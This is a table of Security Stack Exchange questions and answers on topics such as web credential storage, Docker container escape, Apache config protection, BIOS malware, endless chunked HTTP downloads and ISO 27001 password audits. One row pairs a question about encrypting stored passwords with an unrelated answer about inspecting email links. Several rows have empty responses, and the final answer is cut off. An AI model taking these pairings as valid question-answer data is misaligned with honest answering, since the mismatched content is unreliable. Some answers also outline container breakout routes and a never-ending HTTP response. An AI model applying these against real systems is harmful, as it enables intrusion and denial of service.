source_id (int64, 1 to 4.64M) | question (string, 0 to 28.4k) | response (string, 0 to 28.8k) | metadata (dict) |
---|---|---|---|
152,906 | I have a web app that includes third party websites in iframes. The 3rd party websites require user to be logged in them. Option A is to require the user to login to each website individually via iframes and rely on cookies to remember the user. That however is quite inconvenient and some users would definitely prefer a one login for all websites so that's my option B: It relies almost entirely on frontend security and encryption. First, storing the password. Every user has a password (main password) to my web app. The password, besides being used for logging in to my website, would also be used to encrypt user credentials from user's websites. So credentials are encrypted using the main password on my server and only the user could decrypt them. This is where I have a question, would I just need to encrypt it using the password alone, or some magic secret keys or some stuff could be used to strengthen encryption? Overall process: User logs in to my web app. Main password is stored in browser memory for further use Pulling encrypted credentials from server and decrypting it on the
frontend, using the main password decrypted credentials are stored in browser memory open login iframe and send credentials using postMessage to the login
iframe (origin validation included) log in automatically (I have integration plugin for the sites, that's
why I would be able to do it). Note that logging in to web app and decrypting credentials are 2 different processes. If the user refreshes website, is still logged in, he cannot access the credentials. He will be asked for the password again. That's not a problem, since the session from third party websites will be remembered by the browser anyway. So the frontend data would be protected from iframes by web security and as long as I make sure there are no XSS sinks on the web app, there's no way these passwords are leaking, am I right? Even if the server was compromised. The only way I see it, if the server was compromised and someone edited the frontend code to be malicious and grab the passwords. But that is something that would always be dangerous, even if I didn't implement autologin at all. I just want your opinion if that's a secure way to store and use passwords and what could potentially go wrong. Especially, is it safe to store passwords in javascript memory and how to encrypt credentials - use just the user password or maybe add some secret token to that password (don't know if that makes sense). Anything that would make it more secure. Any help appreciated. | One of my employers told us that if we receive a suspicious email with links, we have to hover over the link (to check that it is not spoofed) before clicking it. When you mouseover a link, the value of the href attribute is displayed in the status bar. Since this is the link target, it can give you an idea about where the link is going. would someone be able to spoof this action and try to do something funny? Generally, yes. The actual link target can be "spoofed" using Javascript: It is quite common for websites to exchange the href value with another link as soon as the user clicks on it. For example, you can observe this when visiting Google search results. When you mouseover one of the links, it will be displayed as https://security.stackexchange.com/... but as soon as you click it, that event is captured and you visit an intermediate site first ( https://www.google.com/url?... ) which redirects you to the actual target. But any well-designed (web-based) mail client will not execute any JS in HTML e-mails. Active script content in e-mails is dangerous - not only because it potentially results in an XSS flaw in the mail client but because it can also be used to run JS-based exploits against the browser or simply inform the sender that you have opened the mail. So, if your mail client disallows JS in e-mails - which it most likely does - then the link displayed on mouseover is indeed the correct link target. But you should be aware of other attempts to deceive you, such as homograph attacks or an overly long URL that disguises the actual target domain. It's not as easy to analyze an URL in the status bar as it is from looking at it in the address bar. In a more advanced attack, the attacker could also have compromised a legitimate site beforehand (e.g. through a persistend XSS flaw) and you won't be able to tell from the link at all that the site now actually hosts dangerous content. | {
"source": [
"https://security.stackexchange.com/questions/152906",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/112239/"
]
} |
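The row above asks whether the main password alone is enough to encrypt the stored credentials. The usual pattern is to derive a key from the password with a slow, salted KDF and then use an authenticated cipher; a server-side secret ("pepper") can additionally be mixed into the KDF input so that a database dump alone is not enough, but it does not replace the slow KDF. A minimal sketch, assuming Python with the `cryptography` package; the parameters and blob layout are illustrative, not the poster's actual design:

```python
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

def derive_key(main_password: bytes, salt: bytes) -> bytes:
    # Slow, salted KDF so the stored blob cannot be attacked with a plain
    # dictionary of passwords; the iteration count is an illustrative value.
    kdf = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=salt, iterations=600_000)
    return kdf.derive(main_password)

def encrypt_credentials(main_password: bytes, plaintext: bytes) -> bytes:
    salt = os.urandom(16)
    nonce = os.urandom(12)
    key = derive_key(main_password, salt)
    # AES-GCM gives confidentiality plus integrity (tampering is detected).
    ciphertext = AESGCM(key).encrypt(nonce, plaintext, None)
    return salt + nonce + ciphertext      # store this opaque blob server-side

def decrypt_credentials(main_password: bytes, blob: bytes) -> bytes:
    salt, nonce, ciphertext = blob[:16], blob[16:28], blob[28:]
    key = derive_key(main_password, salt)
    return AESGCM(key).decrypt(nonce, ciphertext, None)
```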
152,978 | I'm learning a lot about docker. I'm practicing creating docker clusters using docker-swarm, registry, shipyard, etc. I saw how easy it is to get root on a docker host machine once you have entered the host with a limited user which has docker privileges. I was wondering if, instead of this, it could be possible to "escape" from a docker container service to the docker host machine (it doesn't matter whether as root or not). Can this be done? Any proof of concept? I was googling and I haven't found anything conclusive. | A user on a Docker host who has access to the docker group or privileges to sudo docker commands is effectively root (as you can do things like use docker to run a privileged container or mount the root filesystem inside a container), which is why it's very important to control that right. Breaking out of a Docker container to the host is a different game and will be more or less difficult depending on a number of factors. Possible vectors include: Kernel vulnerabilities. Containers running on a host share the same kernel as the host, so if there's an exploitable issue in the kernel it may be used to break out of the container to the host. Bad configuration. If a container that you have access to is running with --privileged you're likely to be able to get access to the underlying host. Mounted filesystems. If a container you have mounts a host filesystem, you can likely change items in that filesystem which could allow you to escalate privileges to the host. Mounted Docker socket. A relatively common (and dangerous) practice in Docker containers is to mount the docker socket inside a container, to allow the container to understand the state of the docker daemon. This allows a trivial breakout to the host. More information here If you're looking for more information I'd recommend these whitepapers from NCC, Abusing Privileged and Unprivileged Linux Containers and Understanding and Hardening Linux Containers . There's also a presentation I did which covers some of this stuff here . If you're interested in Docker hardening I'd also recommend having a look at the CIS Security standard . | {
"source": [
"https://security.stackexchange.com/questions/152978",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/133285/"
]
} |
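A rough self-check along the lines of the breakout vectors listed in the answer above (mounted Docker socket, --privileged, host-backed mounts), meant to be run from inside a container. This is a hedged sketch with heuristic checks for manual review, not a complete audit:

```python
import os

def check_docker_socket() -> None:
    # A mounted Docker socket lets the container drive the host's Docker
    # daemon, which is effectively root on the host.
    if os.path.exists("/var/run/docker.sock"):
        print("WARNING: /var/run/docker.sock is present inside the container")

def check_capabilities() -> None:
    # Containers started with --privileged carry a much larger effective
    # capability set than the default; print CapEff for manual review.
    with open("/proc/self/status") as status:
        for line in status:
            if line.startswith("CapEff:"):
                print("Effective capabilities (hex bitmask):", line.split()[1])

def check_host_mounts() -> None:
    # Bind mounts backed by host block devices are another common
    # escalation path; list them for manual review.
    with open("/proc/mounts") as mounts:
        for line in mounts:
            device, mountpoint, fstype = line.split()[:3]
            if device.startswith("/dev/"):
                print("Possible host-backed mount:", device, "->", mountpoint, f"({fstype})")

if __name__ == "__main__":
    check_docker_socket()
    check_capabilities()
    check_host_mounts()
```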
153,027 | I made files with MySQL database login details. Using .htaccess , I redirect every user from /Config/config.php to /index.php . I am wondering whether this is secure enough - that is, whether it is enough to stop users from viewing /Config/config.php ? | This can provide adequate security, if configured correctly. I can think of one common flaw: with Apache and rewrite rules, it is often possible to construct a URL that points to the same file and is not redirected. For example, requesting /Config/config.php redirects, but requesting //Config//config.php does not. This is because the rewrite rule matches an exact URL, not any variation. Another common error when using redirecting for security is sending the header to redirect, but not preventing the page from rendering. An attacker can then access the pages by ignoring the Location header. However, this is typically an error in the application and not when using Apache to do the redirection. A better way is to place the config file outside of the web root. So you have index.php in a subdirectory public , and config.php outside of this directory. This reduces the possibility that you expose the configuration. | {
"source": [
"https://security.stackexchange.com/questions/153027",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/102283/"
]
} |
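The answer above notes that rewrite-based redirects often match an exact URL and can be bypassed with trivial path variations. A quick probe of a few variants makes this testable; a sketch assuming Python with `requests`, where the hostname and paths are placeholders:

```python
import requests

BASE = "https://example.test"          # placeholder for the site under test
VARIANTS = [
    "/Config/config.php",
    "//Config//config.php",
    "/Config/./config.php",
    "/Config/config.php/",
]

for path in VARIANTS:
    # allow_redirects=False so we see the raw status code the rewrite rule produces
    response = requests.get(BASE + path, allow_redirects=False, timeout=10)
    print(f"{path!r}: HTTP {response.status_code}, {len(response.content)} bytes")
    # A 200 with PHP source or config values in the body means the rule was bypassed.
```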
153,042 | I'm looking into ways of hardening a computer's security. One of the things is the BIOS. Does adding a password to the BIOS prevent malware from infecting it? I have seen this article: Protecting the BIOS from malware but it doesn't mention about passwords. Any information on this is greatly appreciated. | Absolutely not. The BIOS password is only an authentication mechanism presented when the system boots or when a manual change to the configuration is made during boot. Malware which overwrites the BIOS typically does so by writing over SPI, the interface which the BIOS resides on. If malware gets enough privileges to write to SPI, and your BIOS does not set the proper lock bits that deny access to this interface at runtime, then it is game over. The contents of your BIOS flash chip can be modified completely, including the contents which execute the password authenticating code. The only two ways to ensure malware cannot overwrite the BIOS is either to: Have a BIOS which properly sets all the lock bits at boot, and the only way to make sure of that is to use the chipsec framework and understand the results it gives Use a system which supports BootGuard , an Intel feature in some newer CPUs which causes the chipset to verify the BIOS itself before loading it, ensuring that it can only boot from a BIOS signed with an OEM signing key. This should prevent malicious BIOSes from running (as well as 3rd-party, open-source BIOSes like Coreboot and Libreboot). | {
"source": [
"https://security.stackexchange.com/questions/153042",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141152/"
]
} |
153,176 | Is it possible to build a file from scratch such that when it gets downloaded via HTTP, the download never actually completes? I am not talking about ZIP BOMB here. Some download software allows you to download streaming events, thus the final size of the file is not known. Is it possible to craft a file where the download software is not able to "guess" the actual file size and keeps on downloading? | Yes it is possible. You just need to use the chunked transfer encoding. https://en.wikipedia.org/wiki/Chunked_transfer_encoding Depending on your server's configuration, you might be able to simply create a CGI script that writes and flushes stdout in an infinite loop. It does not seem to work on Lighttpd which I believe buffers the entire output from the CGI script before sending it to the client. It might work on other webservers though. Example: HTTP/1.1 200 OK\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/plain\r\n
\r\n
1e\r\n
Uh-oh, this will never stop.\n
1e\r\n
Uh-oh, this will never stop.\n followed by an infinite repetition of "1e\r\nUh-oh, this will never stop.\n" | {
"source": [
"https://security.stackexchange.com/questions/153176",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5949/"
]
} |
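The same endless chunked response can be produced as a bare TCP server instead of a CGI script. A minimal sketch in Python; the chunk size is computed from the payload rather than hard-coded, and the terminating zero-length chunk is simply never sent, so a client that honours Transfer-Encoding: chunked keeps reading:

```python
import socket
import time

HEADERS = (
    b"HTTP/1.1 200 OK\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Content-Type: text/plain\r\n"
    b"\r\n"
)
CHUNK_BODY = b"Uh-oh, this will never stop.\n"
# A chunk is: size-in-hex CRLF payload CRLF
CHUNK = b"%x\r\n%s\r\n" % (len(CHUNK_BODY), CHUNK_BODY)

def serve(host: str = "127.0.0.1", port: int = 8080) -> None:
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, _ = srv.accept()
        with conn:
            conn.recv(4096)          # read (and ignore) the request
            conn.sendall(HEADERS)
            while True:              # never send the terminating 0-length chunk
                conn.sendall(CHUNK)
                time.sleep(0.1)

if __name__ == "__main__":
    serve()
```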
153,354 | My company's system administrator is asking for our passwords for an ISO audit and my VP IT operations support says it's mandatory for ISMS (ISO27001). Can someone confirm if this is true? | Absolutely not! ISO 27001 requires management of passwords and requires having password policies. Someone in your company is interpreting this as needing to inspect all passwords in the clear to ensure that they meet the password policy. But this is a terrible way of doing this audit. Technology should be in place to force people to comply with password policies when they make passwords, not to inspect them by hand once they are made. There is a wide-ranging series of failures if they want to audit passwords by looking at them ... | {
"source": [
"https://security.stackexchange.com/questions/153354",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141190/"
]
} |
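The answer's point is that the password policy should be enforced by software at the moment a password is set, not inspected by people afterwards. A minimal sketch of such a check at registration or change time; the specific rules are placeholders for whatever the organisation's ISO 27001-aligned policy actually requires:

```python
import re

MIN_LENGTH = 12   # placeholder policy value

def password_policy_violations(password: str) -> list[str]:
    """Return a list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"must be at least {MIN_LENGTH} characters")
    if not re.search(r"[a-z]", password):
        problems.append("must contain a lowercase letter")
    if not re.search(r"[A-Z]", password):
        problems.append("must contain an uppercase letter")
    if not re.search(r"[0-9]", password):
        problems.append("must contain a digit")
    return problems

# The application rejects non-compliant passwords at creation time and then
# stores only a salted hash, so no auditor ever needs to see a password.
```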
153,446 | A lot of services, sites, and applications offer the 'login with Facebook' or 'login with Google' option. For many sites, the browser opens a separate window in which you can enter your username and password. This way, you can check the URL and convince yourself that the origin really is Google/Facebook/whatever. Logging in in this window should be safe, and there is no reason to worry (apart from any privacy concerns you might have). However, this is not always the case. Though I can not find them now, I am quite sure that there are some sites which require you to login with your Facebook/Google account on their site (so the URL shown is not Facebook/Google). I am sure there are some desktop application which do this as well. One example I can give is Nvidia's GeForce experience. Apart from the ridiculousness of having to sign in on Google or Facebook to update a driver, this does not seem to be good practice, since I can't check if I actually login on Google or that the login window is spoofed. I have read a couple of times that using other services to login is considered good practice. Is this true? I can see some serious problems with it. | I am quite sure that there are some sites which require you to login with your facebook/google account on their site (so the URL shown is not facebook/google). I am sure there are some desktop application which do this as well. This is very bad practice for websites, because OAuth / OpenID (which are protocols used to delegate authentication) is designed to work around that exact use case. But there is no other way to do it in desktop applications, because desktop applications don't have redirect functionality. A web page can forward you to the google or facebook authentication, where you can enter your credentials, and then when you authenticate successfully, Google / Facebook can redirect you back to where you came from. This is impossible to do in a desktop application. One way around it is for the desktop application to open a web browser where you authenticate with your auth provider (Google / Facebook), and some magic happening behind the scenes can then authenticate you to the desktop application. But by and large this is an unsolved problem - you'll simply have to trust the desktop application to not steal your credentials. In fact opening a web browser doesn't really solve the problem either; now you're just trusting the browser to not steal your credentials (The browser is a desktop application, too!) I have read a couple of times that using other services to login is considered good practice. Is this true? It's considered good practice because It's user friendly - users don't have to remember a hundred different credentials On the whole it offers better security - you don't have to trust a hundred different implementations and hope every site is bug-free and stores your password safely - you only have to trust Google, or Facebook, to take care of security. And they're much more capable to do so than your teen-aged nephew who wrote yet another login system for his new site. Of course, it also means you're now putting all your eggs in one basket. If someone breaches your Google / Facebook account, you're in much bigger trouble if you use that account to authenticate on a hundred other sites. Also, there are privacy issues in letting your auth provider know which sites you visit and with what frequency you sign in. | {
"source": [
"https://security.stackexchange.com/questions/153446",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141541/"
]
} |
153,593 | The method I am talking about can improve caching of images, videos, and CSS by the ISP rather than just depending on the browser cache. And it also proves the validity of the sender. Is there any reason why this semi-HTTPS is not considered? The cost of asymmetric signing is one thing I can think of. But if we group chunks of static content and calculate a sha256 checksum in batches, validating the signature in the browser can be a better trade-off than the end-to-end network cost for each request not in the browser cache. | Why do we need HTTPS for static content? If we can have a checksum at the end signed by the private key, won't that prove the validity? I think you're setting up a strawman with that question. We don't in fact need HTTPS for static content, and the purpose of HTTPS isn't just to prove the validity of the content. That's just one of several purposes.
The move to switch a huge number of sites to HTTPS (even those serving harmless static content, such as wikipedia) in the last couple of years didn't primarily happen because people were worried about getting the wrong content; it's because people were worried about three-letter-agencies spying on users; e.g. the large-scale move to HTTPS happened primarily for privacy reasons (see for example RFC 7258, Pervasive Monitoring is an Attack .) Your idea of using a signed checksum is already in production all over the internet: Software which you download is often verified like that. Package managers / update systems of most operating systems do this, and individual software projects do it on a smaller scale by publishing pgp / gpg signatures along with their software downloads. This all works irrespective of whether these downloads are delivered via https or not, although https is often used in addition . You're suggesting to add a third protocol besides http and https, maybe one called httpv for "verified", that builds content verification into the protocol but leaves out the rest of ssl. I agree there would be an advantage to serving some static content in the clear so it can be cached. But this is not an option if you're worried about privacy issues in light of the intelligence community's programs to spy on all our communication. Any particular reason why this semi HTTPs not considered? So I'd assume that your third protocol can't gather much steam because there already are solutions which work in place when we really need to verify content, and with so much of the internet now becoming encrypted to guard our privacy, it seems like there wouldn't be much use for another protocol that didn't protect against spying. | {
"source": [
"https://security.stackexchange.com/questions/153593",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/16619/"
]
} |
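The "signed checksum" idea in the question is essentially how software downloads are already verified: publish a detached signature over the file's digest and let the client verify it before use. A sketch with Python's `cryptography` package; note this provides integrity and authenticity only, not the confidentiality that motivated the large-scale move to HTTPS:

```python
import hashlib
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# --- publisher side -------------------------------------------------------
signing_key = Ed25519PrivateKey.generate()
public_key = signing_key.public_key()          # distributed out of band

static_content = b"body { color: #333; }\n"    # e.g. a CSS file served in the clear
digest = hashlib.sha256(static_content).digest()
signature = signing_key.sign(digest)           # published next to the file

# --- client side ----------------------------------------------------------
received = static_content                      # fetched over plain HTTP or a cache
received_digest = hashlib.sha256(received).digest()
public_key.verify(signature, received_digest)  # raises InvalidSignature if tampered
print("content verified")
```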
153,719 | I use a SSL in my main domain, that is the one my clients access. However, I have a second domain with the same content (including login credentials) that I use only for test and development. Should I secure this test domain too? | Yes, you should. You might need to test if e.g. a particular request works over HTTPS, but testing on a production system is a bad idea (the production system should remain stable), and your test system should match the production system as closely as possible. Secondly, if you're sharing the login details between domains, why shouldn't the test domain be secured as well? If the price of the certificate is a problem, what you can do is: Get a free cert from Let's Encrypt . Use a self-signed cert. Set up your own internal certificate authority for the test domain (probably the best option). | {
"source": [
"https://security.stackexchange.com/questions/153719",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/107556/"
]
} |
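For the self-signed or internal-CA options above, a certificate for a test domain can also be generated programmatically. A sketch using Python's `cryptography` package; the domain name and validity period are placeholders:

```python
import datetime
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa

TEST_DOMAIN = "test.example.internal"   # placeholder test domain

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, TEST_DOMAIN)])
now = datetime.datetime.now(datetime.timezone.utc)

cert = (
    x509.CertificateBuilder()
    .subject_name(name)                 # self-signed: subject == issuer
    .issuer_name(name)
    .public_key(key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(now)
    .not_valid_after(now + datetime.timedelta(days=90))
    .add_extension(x509.SubjectAlternativeName([x509.DNSName(TEST_DOMAIN)]), critical=False)
    .sign(key, hashes.SHA256())
)

with open("test_key.pem", "wb") as f:
    f.write(key.private_bytes(serialization.Encoding.PEM,
                              serialization.PrivateFormat.TraditionalOpenSSL,
                              serialization.NoEncryption()))
with open("test_cert.pem", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.PEM))
```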
153,750 | I have used ssh-keygen for creating an RSA 4096-bit SSH private and public key pair. I used a passphrase for the private key. If an attacker, Eve, knows the passphrase in addition to the public key: Can they derive the private key? - I presume yes with enough time. If they can derive the public key, what algorithms can they use to do this? - I don't know. What is the number (or order) of operations needed for each algorithm to derive the private key? Update - it seems that with using "yafu" on one computer ( http://iamnirosh.blogspot.co.uk/2015/02/factoring-rsa-keys.html ) that the brute force cracking process / factoring takes significantly less time. Would be interesting to see how much difference yafu makes on a distributed environment and on supercomputers. | The private key is unrelated to the passphrase. So is the public key. The public key is also generally stored unencrypted, even when the private key is protected by a passphrase. (Exceptions may exist where the public key is stored in an encrypted form, but in the basic case and assuming a sufficiently large key, doing so provides no additional security because the public key is meant to be publicly distributed or at least can be assumed to be available to an adversary.) Now, don't get me wrong. Protecting your private key with a passphrase is a very good idea, and it is best practice to do so. The private key and the public key have a mathematical relationship to each other. But your private key is still just a number. This number is unrelated to the passphrase you use to encrypt the file that holds this number, which is all the passphrase does. If an attacker Eve knows the passphrase in addition to the Public Key; Can they derive the Private key? - I presume yes with enough time. The public key is mathematically related to the private key, and the simple answer is that yes, with sufficient time, in theory, one can be derived from the other. The public key almost by definition needs to be transmitted in the clear in order to establish an identity before the encrypted communications channel is set up, so Eve (by convention Eve is a passive eavesdropper; Mallory is an active man in the middle) can see it. Deriving the public key from the private key in RSA is easy. Deriving the private key from the public key is supposed to be computationally infeasible, and with sufficiently large keys effectively impossible. So far as we know, there is no fast way to derive the private RSA key data from a 4096-bit public RSA modulus on a classical computer (which is what we currently have). Even an efficient attack on a 2048-bit public RSA modulus would be quite a feat, though 1024-bit RSA is within the realm of possible in reasonable amounts of time and a 768-bit RSA private key has been factored in public (it took the equivalent of on the order of 2,000 CPU-years on reasonably modern hardware). So, "with enough time", it is possible. But that is unrelated to the passphrase, or lack of passphrase. To understand the why of the above, I will use textbook RSA for simplicity. (Real-world RSA is similar to, but not exactly the same as, textbook RSA, as there are many real-world attacks that textbook RSA doesn't deal with.) Here, among some other numbers, the private key is the pair of prime numbers commonly referred to as p and q , and the public key is their product, n = pq , where n is referred to as the public modulus . 
Given p and q , calculating n is borderline trivial (you just need to multiply two -- very large -- numbers together), but given only n , determining the corresponding values for p and q is extremely difficult. We have no proof that this is so, though; only the absence of any publicly known easy way to actually do it, even with lots of very smart people having worked at the problem for a long time. It's like figuring out that 15 = 3 * 5, except that instead of numbers of a few digits, the numbers involved are many hundreds of digits. To a first order approximation, with your 4096-bit RSA key, n is about 1300 decimal digits long, and p and q are a little more than 600 decimal digits long each. We can see this because log 10 (2 4096 ) ≈ 1233, and 10 615 * 10 615 = 10 1230 . If they can derive the public key, what algorithms can they use to do this? - I don't know. Semiprime number factorization algorithms. The current state of the art for numbers larger than 10 100 (100 decimal digits, about 332 bits) is the General Number Field Sieve (GNFS) algorithm. A quantum computer could use Shor's algorithm to efficiently factor a semiprime, but (at least in public) we don't yet know how to build a large enough quantum computer that actually works. That's part of what the push toward so-called post-quantum cryptography is about. Last I heard, state of the art was having factored the number 15, but that was a few years ago; it is possible that publicly known quantum computers are now able to factor numbers larger than 15. What is the number (or order) of operations needed for each algorithm to derive the Private key? The complexity of factoring a number using the GNFS is discussed on its Wikipedia page. It's really difficult to discuss the number of operations directly, but after some discussion on prerequisites, the Wikipedia article summarizes by stating that the running time of the number field sieve is super-polynomial but sub-exponential in the size of the input. You can compare the various factoring times and algorithms used for the various RSA numbers , which were part of a competition started in the early 1990s to expand the knowledge relating to integer factorization, now inactive. Compare also How is it possible that people observing an HTTPS connection being established wouldn't know how to decrypt it? Note that HTTPS works differently from SSH, but the basic operating principle remains similar. | {
"source": [
"https://security.stackexchange.com/questions/153750",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71751/"
]
} |
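To make the p, q, n relationship above concrete, here is textbook RSA with deliberately tiny primes, small enough that factoring n is instant; that factoring step is exactly what becomes infeasible at 2048 or 4096 bits. For illustration only, never with real key sizes:

```python
# Textbook RSA with toy numbers (do not use for anything real).
p, q = 61, 53                 # the private primes
n = p * q                     # 3233, the public modulus - trivial to compute from p and q
phi = (p - 1) * (q - 1)       # 3120
e = 17                        # public exponent
d = pow(e, -1, phi)           # 2753, the private exponent

message = 65
ciphertext = pow(message, e, n)          # encrypt with the public key (e, n)
assert pow(ciphertext, d, n) == message  # decrypt with the private key (d, n)

# "Breaking" the key means recovering p and q from n alone. Trial division
# works instantly for n = 3233 but is hopeless for a 4096-bit modulus.
recovered_p = next(i for i in range(2, n) if n % i == 0)
recovered_q = n // recovered_p
assert {recovered_p, recovered_q} == {p, q}
```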
153,797 | Many security measures are intended to protect against hostile users who want to abuse the software or get access to content they don't have permission to access. Things like CSRF protection, SQLi protection, TLS and many other security features mainly protect against malicious users. But what if all the users can be trusted? Suppose you have a fully internal web application that will only ever run on the intranet of the company and will never be accessible from the outside. assume that all the internal users can be trusted, there are no outside users and the data inside the application is of not much use to attackers. This means the threat model is very limited and there is not much sensitive data. Considering these details, it seems like some of the measures, like TLS and XSS protection, wouldn't be as important. After all, there is very little risk of attackers intercepting traffic, and the users can be trusted to not enter XSS payloads. In this case, would it still make sense to implement security measures against traffic interception or malicious users? | Yes. Absolutely, yes. Your assumptions about your internal network have issues: you assume no attacker would ever gain control of any device in your network, which is a bad assumption to make (see http://www.verizonenterprise.com/verizon-insights-lab/dbir/ , https://www.fireeye.com/current-threats/annual-threat-report/mtrends.html ). Attackers will go quite some length to gain a foothold in a network, and there is a commercial marketplace for buying compromised hosts within specific companies. you assume only users have access, but what about third parties, such as managed service providers, contractors, temporary employees? Also, what happens if someone breaks into wifi? Or gains access to a wired port (e.g. a pwnplug ) More generally, there is also the matter of why have two sets of practice/standards, when surely it is more efficient to have a single standard that applies everywhere? You might find it useful to read Google's paper on BeyondCorp, https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/44860.pdf . The tl;dr being that in their conception of the network, you make assertions about users and devices, but not about the network - mostly because it is simpler to assume all networks are hostile, than it is to assume some are, and some are not (in part, the cost of misclassifying a network as safe could be very, very high). One possible reason for such an approach is that the Snowden leaks revealed that previous assumptions about the safety of their network were incorrect - the NSA tapped into fiber in order to tap into (at the time unencrypted) inter-DC data flows. I think the basic answer to your question is that the boundary/demarcation point for security is no longer at the edge of your network, it is the devices on your network. And as such, it is both simpler, and more realistic, to focus on preventing categories of attacks/abuse, rather than to consider that one network is 'better' than another. You may not need quite such strong controls on an internal DMZ as you would on an external one, but assuming that your network is secure is a dangerous assumption to make. | {
"source": [
"https://security.stackexchange.com/questions/153797",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/34161/"
]
} |
153,961 | I often go to more obscure pages on NASA websites, and I have gotten used to running into an expired security certificate now and then. Over the last week, it started coming up a lot more, to the point I decided maybe I should tell them (rather than simply feel annoyed). But after a little looking around, I realized I had no idea how to direct that message within that giant organization to someone who could actually do something about it. Is there a way for someone to get that message through to the right people? Three recent examples: https://sservi.nasa.gov/ https://trajbrowser.arc.nasa.gov/ https://settlement.arc.nasa.gov/75SummerStudy/Table_of_Contents1.html (Someone else who checked the 2nd and 3rd address said they no longer get the warning, however I still do. The SSERVI site still shows that way for everyone.) Update: The comment to contact the general address makes a good point in that if you do nothing else, you should do that. However, a lot of time could be saved by directing a message to the right people, and it seemed there could be a way to do that, if one knew a little more. That's why I posted at all, I thought someone might search later, find this, and get these notifications to the right place faster. | In this case, the answer is (sort of) in the certs (which is not that uncommon): openssl s_client -connect sservi.nasa.gov:443 | openssl x509 -text
<...snip...>
Authority Information Access:
CA Issuers - URI:http://pki.treas.gov/noca_ee_aia.p7c
CA Issuers - URI:ldap://lc.nasa.gov/ou=NASA%20Operational%20CA,ou=Certification%20Authorities,ou=NASA,o=U.S.%20Government,c=US?cACertificate;binary
OCSP - URI:http://ocsp.treas.gov The first link (minus the P7C file) provides a landing page, with a 'contact us': http://pki.treas.gov/contact_us.htm Another tool (sometimes) worth checking into is whois - but the x509 authority information seems the more appropriate place to check. | {
"source": [
"https://security.stackexchange.com/questions/153961",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/142021/"
]
} |
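The openssl commands in the answer above can be reproduced programmatically: fetch the server certificate and read its Authority Information Access extension to find the issuing CA's URLs (and from there a point of contact). A sketch using Python's standard `ssl` module together with the `cryptography` package:

```python
import ssl
from cryptography import x509
from cryptography.x509.oid import ExtensionOID

HOST = "sservi.nasa.gov"

# Fetch the leaf certificate presented by the server (PEM encoded, no validation).
pem = ssl.get_server_certificate((HOST, 443))
cert = x509.load_pem_x509_certificate(pem.encode())

try:
    aia = cert.extensions.get_extension_for_oid(
        ExtensionOID.AUTHORITY_INFORMATION_ACCESS
    ).value
except x509.ExtensionNotFound:
    aia = []

for access in aia:
    # Typically "caIssuers" and "OCSP" entries carrying http:// or ldap:// URIs.
    print(access.access_method, access.access_location.value)
```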
153,964 | Prologue. Imagine a website with a login. You have an account, enter your e-mail address and a password. Error. Password incorrect. You try two other passwords. Both incorrect and now your account is locked. Fortunately, it's not a timed lock, but you do have to change your password. I click the link in the "you forgot your password"-e-mail and enter a new password. The website responds with: "please choose a password other than your current password". OK, so here's my question: would there be (other) security risks involved if, instead of forcing me to change my password, the e-mail they send me after n invalid passwords, would contain a link that sends me back to the login page, but with n new login attempts? | | {
"source": [
"https://security.stackexchange.com/questions/153964",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/92821/"
]
} |
153,995 | Scenario:
no router, just a laptop network card turned in monitor mode.
(imagine you are in the bus or train) In this scenario can I see all the data that is going through air around me? Can I capture this data? Can I get some relevant info out of this data? (e.g. source and destination of the packets) EDIT: Can I sniff the traffic of other networks (other routers around me, and smarthphones) and get some relevant info? what can I see? I should at least see the source and destination IP, but can I get some info our of this packets or the packets are totally encrypted? This scenario is monitor mode? promiscuous would be when I am actually connected to the network I am sniffing? or do I miss something? | | {
"source": [
"https://security.stackexchange.com/questions/153995",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/141309/"
]
} |
154,013 | A lot of banks I have dealt with require the customer to enter their customer number, internet banking password (or phone password) and date of birth all via the phone keypad, prior to being connected to a staff member. Each of these individual details are followed by the # symbol. After entering these details, the customer can perform most actions (e.g. transfer money or change personal details) without any further verification procedures. Depending on which phone you use, these numbers remain on the screen for the remainder of the phone call. Additionally, when transferring money via this method, the bank no longer requires 2-step authentication, unlike when transferring money via the banking app or website. This is the same regardless of whether you call from the number linked to the account, or an entirely different number. This seems a lot less secure than using the bank app or website. But how much of a security threat does this present? In the context of a smartphone - How easy would it be for malware/spyware/keyloggers to extract the numbers separated by the #, and therefore gain access to the associated bank account via phone banking? | | {
"source": [
"https://security.stackexchange.com/questions/154013",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
154,190 | What do you call an entity seeking to be authenticated? Is there a single word or short phrase for it? What would you name a variable that represented the party asking to be authenticated? | In IEEE 802.1X terminology that would be the supplicant : Authenticator An Authenticator is an entity that requires authentication from
the Supplicant. The Authenticator may be connected to the
Supplicant at the other end of a point-to-point LAN segment or
802.11 wireless link.
Supplicant A Supplicant is an entity that is being authenticated by an
Authenticator. The Supplicant may be connected to the
